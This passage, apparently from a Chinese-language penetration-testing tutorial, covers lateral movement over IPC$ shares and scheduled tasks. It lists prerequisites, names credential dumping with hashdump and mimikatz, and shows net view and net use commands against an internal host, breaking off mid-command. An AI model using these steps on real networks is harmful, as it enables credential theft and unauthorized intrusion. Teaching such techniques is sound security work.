内置工具横向移动
前言
前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。
IPC
IPC+Schtasks(文件共享服务和定时任务)
利用条件:
开放了139,445端口
必须开启IPC$文件共享服务
需要目标机器的管理员账号和密码
hashdump
load mimikatz
得到账号和密码
kerberos
ssp
wdigest
net view 当前的域有哪些主机
net use 查看当前是否有开放IPC连接
此时还没有建立ipc连接,我们尝试建立一下ipc连接
在这里已经获取了一个shell,而且通过net view主机存活探测,发现了另一台主机(在同一网段)
删除IPC连接
net use \192.168.52.141\ipc$ /del
添加IPC连接
net use \19